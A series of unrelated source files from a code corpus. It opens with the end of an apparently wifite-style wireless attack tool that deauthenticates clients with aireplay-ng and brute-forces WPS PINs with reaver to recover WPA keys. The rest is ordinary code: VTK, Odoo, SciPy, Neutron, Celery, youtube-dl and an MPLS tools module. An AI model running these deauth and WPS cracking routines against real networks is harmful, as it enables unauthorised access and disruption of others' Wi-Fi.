'-h', clients[0].bssid,
iface]
return cmd
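# Note: attack_num maps to the aireplay-ng modes built above:
# 0=arp-replay, 1=chopchop, 2=fragmentation, 3=caffe-latte,
# 4=p0841 (interactive replay), 5=hirte (cfrag).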
def wep_send_deauths(iface, target, clients):
"""
Sends deauth packets to broadcast and every client.
"""
# Send deauth to broadcast
cmd = ['aireplay-ng',
'--deauth', '1',
'-a', target.bssid,
iface]
call(cmd, stdout=DN, stderr=DN)
# Send deauth to every client
for client in clients:
cmd = ['aireplay-ng',
'--deauth', '1',
'-a', target.bssid,
'-h', client.bssid,
iface]
call(cmd, stdout=DN, stderr=DN)
#################
# WPS FUNCTIONS #
#################
def wps_attack(iface, target):
"""
Mounts attack against target on iface.
Uses "reaver" to attempt to brute force the PIN.
Once PIN is found, PSK can be recovered.
PSK is displayed to user and added to WPS_FINDINGS
"""
print GR+' [0:00:00]'+W+' initializing %sWPS PIN attack%s on %s' % \
(G, W, G+target.ssid+W+' ('+G+target.bssid+W+')'+W)
cmd = ['reaver',
'-i', iface,
'-b', target.bssid,
'-o', temp + 'out.out', # Dump output to file to be monitored
'-a', # auto-detect best options, auto-resumes sessions, doesn't require input!
'-c', target.channel,
# '--ignore-locks',
'-vv'] # verbose output
proc = Popen(cmd, stdout=DN, stderr=DN)
cracked = False # Flag for when password/pin is found
percent = 'x.xx%' # Percentage complete
aps = 'x' # Seconds per attempt
time_started = time.time()
last_success = time_started # Time of last successful attempt
last_pin = '' # Keep track of last pin tried (to detect retries)
retries = 0 # Number of times we have attempted this PIN
tries_total = 0 # Number of times we have attempted all pins
tries = 0 # Number of successful attempts
pin = ''
key = ''
try:
while not cracked:
time.sleep(1)
if proc.poll() != None:
# Process stopped: Cracked? Failed?
inf = open(temp + 'out.out', 'r')
lines = inf.read().split('\n')
inf.close()
for line in lines:
# When it's cracked:
if line.find("WPS PIN: '") != -1:
pin = line[line.find("WPS PIN: '") + 10:-1]
if line.find("WPA PSK: '") != -1:
key = line[line.find("WPA PSK: '") + 10:-1]
cracked = True
break
if not os.path.exists(temp + 'out.out'): continue
inf = open(temp + 'out.out', 'r')
lines = inf.read().split('\n')
inf.close()
for line in lines:
if line.strip() == '': continue
# Status
if line.find(' complete @ ') != -1 and len(line) > 8:
percent = line.split(' ')[1]
i = line.find(' (')
j = line.find(' seconds/', i)
if i != -1 and j != -1: aps = line[i+2:j]
# PIN attempt
elif line.find(' Trying pin ') != -1:
pin = line.strip().split(' ')[-1]
if pin == last_pin:
retries += 1
elif tries_total == 0:
last_pin = pin
tries_total -= 1
else:
last_success = time.time()
tries += 1
last_pin = pin
retries = 0
tries_total += 1
# Warning
elif line.endswith('10 failed connections in a row'): pass
# Check for PIN/PSK
elif line.find("WPS PIN: '") != -1:
pin = line[line.find("WPS PIN: '") + 10:-1]
elif line.find("WPA PSK: '") != -1:
key = line[line.find("WPA PSK: '") + 10:-1]
cracked = True
if cracked: break
print ' %s WPS attack, %s success/ttl,' % \
(GR+sec_to_hms(time.time()-time_started)+W, \
G+str(tries)+W+'/'+O+str(tries_total)+W),
if percent == 'x.xx%' and aps == 'x': print '\r',
else:
print '%s complete (%s sec/att) \r' % (G+percent+W, G+aps+W),
if WPS_TIMEOUT > 0 and (time.time() - last_success) > WPS_TIMEOUT:
print R+'\n [!]'+O+' unable to complete successful try in %d seconds' % (WPS_TIMEOUT)
print R+' [+]'+W+' skipping %s' % (O+target.ssid+W)
break
if WPS_MAX_RETRIES > 0 and retries > WPS_MAX_RETRIES:
print R+'\n [!]'+O+' unable to complete successful try in %d retries' % (WPS_MAX_RETRIES)
print R+' [+]'+O+' the access point may have WPS-locking enabled, or is too far away'+W
print R+' [+]'+W+' skipping %s' % (O+target.ssid+W)
break
if WPS_RATIO_THRESHOLD > 0.0 and tries > 0 and (float(tries) / tries_total) < WPS_RATIO_THRESHOLD:
print R+'\n [!]'+O+' successful/total attempts ratio was too low (< %.2f)' % (WPS_RATIO_THRESHOLD)
print R+' [+]'+W+' skipping %s' % (G+target.ssid+W)
break
stdout.flush()
            # Truncate the output file between polls so it does not grow unbounded
inf = open(temp + 'out.out', 'w')
inf.close()
# End of big "while not cracked" loop
if cracked:
if pin != '': print GR+'\n\n [+]'+G+' PIN found: %s' % (C+pin+W)
if key != '': print GR+' [+] %sWPA key found:%s %s' % (G, W, C+key+W)
WPA_FINDINGS.append(W+"found %s's WPA key: \"%s\", WPS PIN: %s" % (G+target.ssid+W, C+key+W, C+pin+W))
WPA_FINDINGS.append('')
save_cracked(target.bssid, target.ssid, "Key is '" + key + "' and PIN is '" + pin + "'", 'WPA')
except KeyboardInterrupt:
print R+'\n (^C)'+O+' WPS brute-force attack interrupted'+W
if attack_interrupted_prompt():
send_interrupt(proc)
print ''
exit_gracefully(0)
send_interrupt(proc)
return cracked
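# Note: the WPS attack above drives a single reaver session, roughly:
#   reaver -i <iface> -b <bssid> -c <channel> -a -vv -o out.out
# and scrapes its progress lines ("% complete", "Trying pin", "WPS PIN:",
# "WPA PSK:") from out.out once per second.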
#c = CapFile('hs/KillfuckSoulshitter_C0-C1-C0-07-54-DC_2.cap', 'Killfuck Soulshitter', 'c0:c1:c0:07:54:dc')
#WPA_CRACKER = 'aircrack'
#cracked = wpa_crack(c)
#print cracked
#exit_gracefully(1)
if __name__ == '__main__':
try:
banner()
main()
except KeyboardInterrupt: print R+'\n (^C)'+O+' interrupted\n'+W
except EOFError: print R+'\n (^D)'+O+' interrupted\n'+W
exit_gracefully(0)
| gpl-2.0 |
mspark93/VTK | Filters/Core/Testing/Python/combStreamers2.py | 15 | 2257 | #!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Create the RenderWindow, Renderer and both Actors
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# create pipeline
#
pl3d = vtk.vtkMultiBlockPLOT3DReader()
pl3d.SetXYZFileName("" + str(VTK_DATA_ROOT) + "/Data/combxyz.bin")
pl3d.SetQFileName("" + str(VTK_DATA_ROOT) + "/Data/combq.bin")
pl3d.SetScalarFunctionNumber(100)
pl3d.SetVectorFunctionNumber(202)
pl3d.Update()
output = pl3d.GetOutput().GetBlock(0)
ps = vtk.vtkPlaneSource()
ps.SetXResolution(4)
ps.SetYResolution(4)
ps.SetOrigin(2,-2,26)
ps.SetPoint1(2,2,26)
ps.SetPoint2(2,-2,32)
psMapper = vtk.vtkPolyDataMapper()
psMapper.SetInputConnection(ps.GetOutputPort())
psActor = vtk.vtkActor()
psActor.SetMapper(psMapper)
psActor.GetProperty().SetRepresentationToWireframe()
streamer = vtk.vtkDashedStreamLine()
streamer.SetInputData(output)
streamer.SetSourceData(ps.GetOutput())
streamer.SetMaximumPropagationTime(100)
streamer.SetIntegrationStepLength(.2)
streamer.SetStepLength(.001)
streamer.SetNumberOfThreads(1)
streamer.SetIntegrationDirectionToForward()
streamMapper = vtk.vtkPolyDataMapper()
streamMapper.SetInputConnection(streamer.GetOutputPort())
streamMapper.SetScalarRange(output.GetScalarRange())
streamline = vtk.vtkActor()
streamline.SetMapper(streamMapper)
outline = vtk.vtkStructuredGridOutlineFilter()
outline.SetInputData(output)
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
# Add the actors to the renderer, set the background and size
#
ren1.AddActor(psActor)
ren1.AddActor(outlineActor)
ren1.AddActor(streamline)
ren1.SetBackground(1,1,1)
renWin.SetSize(300,300)
ren1.SetBackground(0.1,0.2,0.4)
cam1 = ren1.GetActiveCamera()
cam1.SetClippingRange(3.95297,50)
cam1.SetFocalPoint(9.71821,0.458166,29.3999)
cam1.SetPosition(2.7439,-37.3196,38.7167)
cam1.SetViewUp(-0.16123,0.264271,0.950876)
# render the image
#
renWin.Render()
# prevent the tk window from showing up then start the event loop
# --- end of script --
| bsd-3-clause |
fhe-odoo/odoo | addons/mail/mail_vote.py | 439 | 1647 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
from openerp.osv import fields, osv
class mail_vote(osv.Model):
    ''' The mail vote feature allows users to like and unlike messages attached
        to a document. This allows, for example, building a ranking-based
        display of messages, for FAQ. '''
_name = 'mail.vote'
_description = 'Mail Vote'
_columns = {
'message_id': fields.many2one('mail.message', 'Message', select=1,
ondelete='cascade', required=True),
'user_id': fields.many2one('res.users', 'User', select=1,
ondelete='cascade', required=True),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
kalvdans/scipy | scipy/linalg/lapack.py | 12 | 8575 | """
Low-level LAPACK functions (:mod:`scipy.linalg.lapack`)
=======================================================
This module contains low-level functions from the LAPACK library.
The `*gegv` family of routines has been removed from LAPACK 3.6.0
and has been deprecated in SciPy 0.17.0. They will be removed in
a future release.
.. versionadded:: 0.12.0
.. warning::
These functions do little to no error checking.
It is possible to cause crashes by mis-using them,
so prefer using the higher-level routines in `scipy.linalg`.
Finding functions
-----------------
.. autosummary::
get_lapack_funcs
All functions
-------------
.. autosummary::
:toctree: generated/
sgbsv
dgbsv
cgbsv
zgbsv
sgbtrf
dgbtrf
cgbtrf
zgbtrf
sgbtrs
dgbtrs
cgbtrs
zgbtrs
sgebal
dgebal
cgebal
zgebal
sgees
dgees
cgees
zgees
sgeev
dgeev
cgeev
zgeev
sgeev_lwork
dgeev_lwork
cgeev_lwork
zgeev_lwork
sgegv
dgegv
cgegv
zgegv
sgehrd
dgehrd
cgehrd
zgehrd
sgehrd_lwork
dgehrd_lwork
cgehrd_lwork
zgehrd_lwork
sgelss
dgelss
cgelss
zgelss
sgelss_lwork
dgelss_lwork
cgelss_lwork
zgelss_lwork
sgelsd
dgelsd
cgelsd
zgelsd
sgelsd_lwork
dgelsd_lwork
cgelsd_lwork
zgelsd_lwork
sgelsy
dgelsy
cgelsy
zgelsy
sgelsy_lwork
dgelsy_lwork
cgelsy_lwork
zgelsy_lwork
sgeqp3
dgeqp3
cgeqp3
zgeqp3
sgeqrf
dgeqrf
cgeqrf
zgeqrf
sgerqf
dgerqf
cgerqf
zgerqf
sgesdd
dgesdd
cgesdd
zgesdd
sgesdd_lwork
dgesdd_lwork
cgesdd_lwork
zgesdd_lwork
sgesvd
dgesvd
cgesvd
zgesvd
sgesvd_lwork
dgesvd_lwork
cgesvd_lwork
zgesvd_lwork
sgesv
dgesv
cgesv
zgesv
sgesvx
dgesvx
cgesvx
zgesvx
sgecon
dgecon
cgecon
zgecon
ssysv
dsysv
csysv
zsysv
ssysv_lwork
dsysv_lwork
csysv_lwork
zsysv_lwork
ssysvx
dsysvx
csysvx
zsysvx
ssysvx_lwork
dsysvx_lwork
csysvx_lwork
zsysvx_lwork
chesv
zhesv
chesv_lwork
zhesv_lwork
chesvx
zhesvx
chesvx_lwork
zhesvx_lwork
sgetrf
dgetrf
cgetrf
zgetrf
sgetri
dgetri
cgetri
zgetri
sgetri_lwork
dgetri_lwork
cgetri_lwork
zgetri_lwork
sgetrs
dgetrs
cgetrs
zgetrs
sgges
dgges
cgges
zgges
sggev
dggev
cggev
zggev
chbevd
zhbevd
chbevx
zhbevx
cheev
zheev
cheevd
zheevd
cheevr
zheevr
chegv
zhegv
chegvd
zhegvd
chegvx
zhegvx
slarf
dlarf
clarf
zlarf
slarfg
dlarfg
clarfg
zlarfg
slartg
dlartg
clartg
zlartg
slasd4
dlasd4
slaswp
dlaswp
claswp
zlaswp
slauum
dlauum
clauum
zlauum
spbsv
dpbsv
cpbsv
zpbsv
spbtrf
dpbtrf
cpbtrf
zpbtrf
spbtrs
dpbtrs
cpbtrs
zpbtrs
sposv
dposv
cposv
zposv
sposvx
dposvx
cposvx
zposvx
spocon
dpocon
cpocon
zpocon
spotrf
dpotrf
cpotrf
zpotrf
spotri
dpotri
cpotri
zpotri
spotrs
dpotrs
cpotrs
zpotrs
crot
zrot
strsyl
dtrsyl
ctrsyl
ztrsyl
strtri
dtrtri
ctrtri
ztrtri
strtrs
dtrtrs
ctrtrs
ztrtrs
cunghr
zunghr
cungqr
zungqr
cungrq
zungrq
cunmqr
zunmqr
sgtsv
dgtsv
cgtsv
zgtsv
sptsv
dptsv
cptsv
zptsv
slamch
dlamch
sorghr
dorghr
sorgqr
dorgqr
sorgrq
dorgrq
sormqr
dormqr
ssbev
dsbev
ssbevd
dsbevd
ssbevx
dsbevx
ssyev
dsyev
ssyevd
dsyevd
ssyevr
dsyevr
ssygv
dsygv
ssygvd
dsygvd
ssygvx
dsygvx
slange
dlange
clange
zlange
ilaver
"""
#
# Author: Pearu Peterson, March 2002
#
from __future__ import division, print_function, absolute_import
__all__ = ['get_lapack_funcs']
import numpy as _np
from .blas import _get_funcs
# Backward compatibility:
from .blas import find_best_blas_type as find_best_lapack_type
from scipy.linalg import _flapack
try:
from scipy.linalg import _clapack
except ImportError:
_clapack = None
# Backward compatibility
from scipy._lib._util import DeprecatedImport as _DeprecatedImport
clapack = _DeprecatedImport("scipy.linalg.blas.clapack", "scipy.linalg.lapack")
flapack = _DeprecatedImport("scipy.linalg.blas.flapack", "scipy.linalg.lapack")
# Expose all functions (only flapack --- clapack is an implementation detail)
empty_module = None
from scipy.linalg._flapack import *
del empty_module
_dep_message = """The `*gegv` family of routines has been deprecated in
LAPACK 3.6.0 in favor of the `*ggev` family of routines.
The corresponding wrappers will be removed from SciPy in
a future release."""
cgegv = _np.deprecate(cgegv, old_name='cgegv', message=_dep_message)
dgegv = _np.deprecate(dgegv, old_name='dgegv', message=_dep_message)
sgegv = _np.deprecate(sgegv, old_name='sgegv', message=_dep_message)
zgegv = _np.deprecate(zgegv, old_name='zgegv', message=_dep_message)
# Modify _flapack in this scope so the deprecation warnings apply to
# functions returned by get_lapack_funcs.
_flapack.cgegv = cgegv
_flapack.dgegv = dgegv
_flapack.sgegv = sgegv
_flapack.zgegv = zgegv
# some convenience alias for complex functions
_lapack_alias = {
'corghr': 'cunghr', 'zorghr': 'zunghr',
'corghr_lwork': 'cunghr_lwork', 'zorghr_lwork': 'zunghr_lwork',
'corgqr': 'cungqr', 'zorgqr': 'zungqr',
'cormqr': 'cunmqr', 'zormqr': 'zunmqr',
'corgrq': 'cungrq', 'zorgrq': 'zungrq',
}
def get_lapack_funcs(names, arrays=(), dtype=None):
"""Return available LAPACK function objects from names.
Arrays are used to determine the optimal prefix of LAPACK routines.
Parameters
----------
names : str or sequence of str
Name(s) of LAPACK functions without type prefix.
arrays : sequence of ndarrays, optional
Arrays can be given to determine optimal prefix of LAPACK
routines. If not given, double-precision routines will be
used, otherwise the most generic type in arrays will be used.
dtype : str or dtype, optional
Data-type specifier. Not used if `arrays` is non-empty.
Returns
-------
funcs : list
List containing the found function(s).
Notes
-----
This routine automatically chooses between Fortran/C
interfaces. Fortran code is used whenever possible for arrays with
column major order. In all other cases, C code is preferred.
In LAPACK, the naming convention is that all functions start with a
type prefix, which depends on the type of the principal
matrix. These can be one of {'s', 'd', 'c', 'z'} for the numpy
    types {float32, float64, complex64, complex128} respectively, and
are stored in attribute `typecode` of the returned functions.
"""
return _get_funcs(names, arrays, dtype,
"LAPACK", _flapack, _clapack,
"flapack", "clapack", _lapack_alias)
def _compute_lwork(routine, *args, **kwargs):
"""
Round floating-point lwork returned by lapack to integer.
Several LAPACK routines compute optimal values for LWORK, which
they return in a floating-point variable. However, for large
values of LWORK, single-precision floating point is not sufficient
to hold the exact value --- some LAPACK versions (<= 3.5.0 at
least) truncate the returned integer to single precision and in
some cases this can be smaller than the required value.
"""
wi = routine(*args, **kwargs)
if len(wi) < 2:
raise ValueError('')
info = wi[-1]
if info != 0:
raise ValueError("Internal work array size computation failed: "
"%d" % (info,))
lwork = [w.real for w in wi[:-1]]
dtype = getattr(routine, 'dtype', None)
if dtype == _np.float32 or dtype == _np.complex64:
# Single-precision routine -- take next fp value to work
# around possible truncation in LAPACK code
lwork = _np.nextafter(lwork, _np.inf, dtype=_np.float32)
lwork = _np.array(lwork, _np.int64)
if _np.any(_np.logical_or(lwork < 0, lwork > _np.iinfo(_np.int32).max)):
raise ValueError("Too large work array required -- computation cannot "
"be performed with standard 32-bit LAPACK.")
lwork = lwork.astype(_np.int32)
if lwork.size == 1:
return lwork[0]
return lwork
| bsd-3-clause |
paninetworks/neutron | neutron/tests/tempest/services/identity/v3/json/endpoints_client.py | 23 | 3361 | # Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from neutron.tests.tempest.common import service_client
class EndPointClientJSON(service_client.ServiceClient):
api_version = "v3"
def list_endpoints(self):
"""GET endpoints."""
resp, body = self.get('endpoints')
self.expected_success(200, resp.status)
body = json.loads(body)
return service_client.ResponseBodyList(resp, body['endpoints'])
def create_endpoint(self, service_id, interface, url, **kwargs):
"""Create endpoint.
Normally this function wouldn't allow setting values that are not
allowed for 'enabled'. Use `force_enabled` to set a non-boolean.
"""
region = kwargs.get('region', None)
if 'force_enabled' in kwargs:
enabled = kwargs.get('force_enabled', None)
else:
enabled = kwargs.get('enabled', None)
post_body = {
'service_id': service_id,
'interface': interface,
'url': url,
'region': region,
'enabled': enabled
}
post_body = json.dumps({'endpoint': post_body})
resp, body = self.post('endpoints', post_body)
self.expected_success(201, resp.status)
body = json.loads(body)
return service_client.ResponseBody(resp, body['endpoint'])
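    # Usage sketch (illustrative values): `force_enabled` exists so negative
    # tests can push a non-boolean through the API, e.g.
    #   client.create_endpoint(service_id, 'public', url, force_enabled='invalid')
    # while `enabled` is intended for ordinary boolean values.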
def update_endpoint(self, endpoint_id, service_id=None, interface=None,
url=None, region=None, enabled=None, **kwargs):
"""Updates an endpoint with given parameters.
Normally this function wouldn't allow setting values that are not
allowed for 'enabled'. Use `force_enabled` to set a non-boolean.
"""
post_body = {}
if service_id is not None:
post_body['service_id'] = service_id
if interface is not None:
post_body['interface'] = interface
if url is not None:
post_body['url'] = url
if region is not None:
post_body['region'] = region
if 'force_enabled' in kwargs:
post_body['enabled'] = kwargs['force_enabled']
elif enabled is not None:
post_body['enabled'] = enabled
post_body = json.dumps({'endpoint': post_body})
resp, body = self.patch('endpoints/%s' % endpoint_id, post_body)
self.expected_success(200, resp.status)
body = json.loads(body)
return service_client.ResponseBody(resp, body['endpoint'])
def delete_endpoint(self, endpoint_id):
"""Delete endpoint."""
resp_header, resp_body = self.delete('endpoints/%s' % endpoint_id)
self.expected_success(204, resp_header.status)
return service_client.ResponseBody(resp_header, resp_body)
| apache-2.0 |
kawamon/hue | desktop/core/ext-py/celery-4.2.1/celery/events/snapshot.py | 3 | 3401 | # -*- coding: utf-8 -*-
"""Periodically store events in a database.
Consuming the events as a stream isn't always suitable
so this module implements a system to take snapshots of the
state of a cluster at regular intervals. There's a full
implementation of this writing the snapshots to a database
in :mod:`djcelery.snapshots` in the `django-celery` distribution.
"""
from __future__ import absolute_import, print_function, unicode_literals
from kombu.utils.limits import TokenBucket
from celery import platforms
from celery.app import app_or_default
from celery.utils.dispatch import Signal
from celery.utils.imports import instantiate
from celery.utils.log import get_logger
from celery.utils.time import rate
from celery.utils.timer2 import Timer
__all__ = ('Polaroid', 'evcam')
logger = get_logger('celery.evcam')
class Polaroid(object):
"""Record event snapshots."""
timer = None
shutter_signal = Signal(name='shutter_signal', providing_args={'state'})
cleanup_signal = Signal(name='cleanup_signal')
clear_after = False
_tref = None
_ctref = None
def __init__(self, state, freq=1.0, maxrate=None,
cleanup_freq=3600.0, timer=None, app=None):
self.app = app_or_default(app)
self.state = state
self.freq = freq
self.cleanup_freq = cleanup_freq
self.timer = timer or self.timer or Timer()
self.logger = logger
self.maxrate = maxrate and TokenBucket(rate(maxrate))
def install(self):
self._tref = self.timer.call_repeatedly(self.freq, self.capture)
self._ctref = self.timer.call_repeatedly(
self.cleanup_freq, self.cleanup,
)
def on_shutter(self, state):
pass
def on_cleanup(self):
pass
def cleanup(self):
logger.debug('Cleanup: Running...')
self.cleanup_signal.send(sender=self.state)
self.on_cleanup()
def shutter(self):
if self.maxrate is None or self.maxrate.can_consume():
logger.debug('Shutter: %s', self.state)
self.shutter_signal.send(sender=self.state)
self.on_shutter(self.state)
def capture(self):
self.state.freeze_while(self.shutter, clear_after=self.clear_after)
def cancel(self):
if self._tref:
self._tref() # flush all received events.
self._tref.cancel()
if self._ctref:
self._ctref.cancel()
def __enter__(self):
self.install()
return self
def __exit__(self, *exc_info):
self.cancel()
def evcam(camera, freq=1.0, maxrate=None, loglevel=0,
logfile=None, pidfile=None, timer=None, app=None):
"""Start snapshot recorder."""
app = app_or_default(app)
if pidfile:
platforms.create_pidlock(pidfile)
app.log.setup_logging_subsystem(loglevel, logfile)
print('-> evcam: Taking snapshots with {0} (every {1} secs.)'.format(
camera, freq))
state = app.events.State()
cam = instantiate(camera, state, app=app, freq=freq,
maxrate=maxrate, timer=timer)
cam.install()
conn = app.connection_for_read()
recv = app.events.Receiver(conn, handlers={'*': state.event})
try:
try:
recv.capture(limit=None)
except KeyboardInterrupt:
raise SystemExit
finally:
cam.cancel()
conn.close()
| apache-2.0 |
titom1986/CouchPotatoServer | couchpotato/core/media/movie/providers/trailer/youtube_dl/extractor/veoh.py | 13 | 4826 | from __future__ import unicode_literals
import re
import json
from .common import InfoExtractor
from ..utils import (
compat_urllib_request,
int_or_none,
ExtractorError,
)
class VeohIE(InfoExtractor):
_VALID_URL = r'http://(?:www\.)?veoh\.com/(?:watch|iphone/#_Watch)/(?P<id>(?:v|yapi-)[\da-zA-Z]+)'
_TESTS = [
{
'url': 'http://www.veoh.com/watch/v56314296nk7Zdmz3',
'md5': '620e68e6a3cff80086df3348426c9ca3',
'info_dict': {
'id': '56314296',
'ext': 'mp4',
'title': 'Straight Backs Are Stronger',
'uploader': 'LUMOback',
'description': 'At LUMOback, we believe straight backs are stronger. The LUMOback Posture & Movement Sensor: It gently vibrates when you slouch, inspiring improved posture and mobility. Use the app to track your data and improve your posture over time. ',
},
},
{
'url': 'http://www.veoh.com/watch/v27701988pbTc4wzN?h1=Chile+workers+cover+up+to+avoid+skin+damage',
'md5': '4a6ff84b87d536a6a71e6aa6c0ad07fa',
'info_dict': {
'id': '27701988',
'ext': 'mp4',
'title': 'Chile workers cover up to avoid skin damage',
'description': 'md5:2bd151625a60a32822873efc246ba20d',
'uploader': 'afp-news',
'duration': 123,
},
},
{
'url': 'http://www.veoh.com/watch/v69525809F6Nc4frX',
'md5': '4fde7b9e33577bab2f2f8f260e30e979',
'note': 'Embedded ooyala video',
'info_dict': {
'id': '69525809',
'ext': 'mp4',
'title': 'Doctors Alter Plan For Preteen\'s Weight Loss Surgery',
'description': 'md5:f5a11c51f8fb51d2315bca0937526891',
'uploader': 'newsy-videos',
},
'skip': 'This video has been deleted.',
},
]
def _extract_formats(self, source):
formats = []
link = source.get('aowPermalink')
if link:
formats.append({
'url': link,
'ext': 'mp4',
'format_id': 'aow',
})
link = source.get('fullPreviewHashLowPath')
if link:
formats.append({
'url': link,
'format_id': 'low',
})
link = source.get('fullPreviewHashHighPath')
if link:
formats.append({
'url': link,
'format_id': 'high',
})
return formats
def _extract_video(self, source):
return {
'id': source.get('videoId'),
'title': source.get('title'),
'description': source.get('description'),
'thumbnail': source.get('highResImage') or source.get('medResImage'),
'uploader': source.get('username'),
'duration': int_or_none(source.get('length')),
'view_count': int_or_none(source.get('views')),
'age_limit': 18 if source.get('isMature') == 'true' or source.get('isSexy') == 'true' else 0,
'formats': self._extract_formats(source),
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
if video_id.startswith('v'):
rsp = self._download_xml(
r'http://www.veoh.com/api/findByPermalink?permalink=%s' % video_id, video_id, 'Downloading video XML')
stat = rsp.get('stat')
if stat == 'ok':
return self._extract_video(rsp.find('./videoList/video'))
elif stat == 'fail':
raise ExtractorError(
'%s said: %s' % (self.IE_NAME, rsp.find('./errorList/error').get('errorMessage')), expected=True)
webpage = self._download_webpage(url, video_id)
age_limit = 0
if 'class="adultwarning-container"' in webpage:
self.report_age_confirmation()
age_limit = 18
request = compat_urllib_request.Request(url)
request.add_header('Cookie', 'confirmedAdult=true')
webpage = self._download_webpage(request, video_id)
m_youtube = re.search(r'http://www\.youtube\.com/v/(.*?)(\&|"|\?)', webpage)
if m_youtube is not None:
youtube_id = m_youtube.group(1)
self.to_screen('%s: detected Youtube video.' % video_id)
return self.url_result(youtube_id, 'Youtube')
info = json.loads(
self._search_regex(r'videoDetailsJSON = \'({.*?})\';', webpage, 'info').replace('\\\'', '\''))
video = self._extract_video(info)
video['age_limit'] = age_limit
return video
| gpl-3.0 |
yurri92/MPLS-inventory-management | MPLSinventory/tools.py | 1 | 14446 | from __future__ import print_function
import os
import json
import csv
import re
from copy import copy
from tqdm import tqdm
COMPILED_REGEXES = {}
def search(regex, thing):
""" Regex search anything.
Determine what class the thing is and convert that to a string or list of strings
    returns the results for the first occurrence in the list of strings
    the results are the subgroups for the regex match
- if the regex has a single capture group a single item is returned
- if the regex has multiple capture groups, a tuple is returned with all subgroups
"""
result = ()
if isinstance(thing, list):
for item in thing:
result = search(regex, item)
if result:
if isinstance(result, tuple):
if any(result): # reduce(lambda x, y: bool(x) or bool(y), result): # test if tuple has results
break
else: # if result is not a tuple
break
if isinstance(thing, str): # or isinstance(thing, unicode):
if regex not in COMPILED_REGEXES.keys():
COMPILED_REGEXES[regex] = re.compile(regex)
compiled_regex = COMPILED_REGEXES[regex]
n = compiled_regex.groups # number of capture groups requested
result = tuple(n * ['']) # create tuple of empty strings
match = compiled_regex.search(thing)
# match = re.search(compiled_regex, thing)
if match:
result = match.groups('')
if len(result) == 1:
result = result[0]
return result
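# Usage sketch (illustrative patterns):
#   search(r'hostname (\S+)', 'hostname pe1-router')   # -> 'pe1-router'
#   search(r'(\S+) (\S+)', ['!', 'ip routing'])        # -> ('ip', 'routing')
# A single capture group returns a string, multiple groups return a tuple,
# and a list is scanned until the first element that matches.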
def search_all(regex, thing):
""" Regex search all lines in anything.
determines what class the thing is and converts that to a list of things
each item or line in the list is searched using the regex and search(regex, thing)
if the item has a match, the results are added to a list
"""
result = []
if isinstance(thing, str):
thing = thing.splitlines()
if isinstance(thing, list):
for item in thing:
r = search(regex, item)
if isinstance(r, str):
if r:
result += [r]
if isinstance(r, tuple):
if any(r): # reduce(lambda x, y: bool(x) or bool(y), r): # test if tuple has results
result += [r]
return result
def list_files(regex, path):
return search_all(regex, os.listdir(path))
def read_files_to_objects(path, result_type, regex=r'(.+)', id='', verbose=False):
result = {}
file_names = list_files(regex, path)
# if verbose:
# file_names = tqdm(file_names)
total = len(file_names)
for i, file_name in enumerate(file_names, 1):
if verbose:
# pass
print("opening : {}/{} {}/{}...".format(i, total, path, file_name), end="")
value = result_type.load(file_name, path=path)
if value:
key = getattr(value, id, file_name)
result[key] = value
# del value.config
if verbose:
# pass
print("parsed config for :{}".format(key))
else:
if verbose:
# pass
print("skipping")
return result
def assign_attr_if_better(attribute_name, obj1, obj2):
"""assign an attribute if from obj1 to obj2 if the attr has a value
on obj1, and still has no valueon obj2"""
attribute_obj1 = getattr(obj1, attribute_name, None)
attribute_obj2 = getattr(obj2, attribute_name, None)
if attribute_obj1 and not attribute_obj2:
setattr(obj2, attribute_name, attribute_obj1)
def getattr_recursive(obj, name):
"""Gets attributes from objects recursively.
'name' can contain multiple attributes
'todo': lists and dicts
"""
# split the name into a queue of keywords
name_queue = []
while name:
if name[0] == '.':
name = name[1:]
attribute, remainder = search(r'^([\w_]+)(.*)', name) # normal attribute name
if attribute:
name = remainder
name_queue.append(attribute)
key, remainder = search(r'^\[[\'\"](.+?)[\'\"]\](.*)', name) # dictionary key
if key:
name = remainder
name_queue.append(key)
index, remainder = search(r'^\[(\d+)\](.*)', name) # list index
if index:
name = remainder
name_queue.append(int(index))
# retrieve the keywords from the object.
result = obj
while name_queue and result:
if isinstance(result, list):
index = name_queue.pop(0)
if index < len(result):
result = result[index]
else:
result = ''
elif isinstance(result, dict):
key = name_queue.pop(0)
if key in result.keys():
result = result[key]
else:
result = ''
else:
attribute = name_queue.pop(0)
result = getattr(result, attribute, '')
return result
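# Usage sketch (hypothetical object layout):
#   getattr_recursive(router, "interfaces[0].ip")
#   getattr_recursive(router, "vrfs['CUST-A'].description")
# Plain attribute names, ['key'] dictionary lookups and [index] list accesses
# can be chained in one string; anything missing resolves to ''.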
def create_dict_from_objects(objects, attributes=[]):
"""to improve, convert ip objects to str (if type is ip then str(obj))"""
result = {}
for key, my_obj in objects.items():
if not attributes:
result[key] = my_obj.json()
else:
r = {}
for attribute in attributes:
item = getattr_recursive(my_obj, attribute)
if attribute.endswith('ip') and item:
item = str(item)
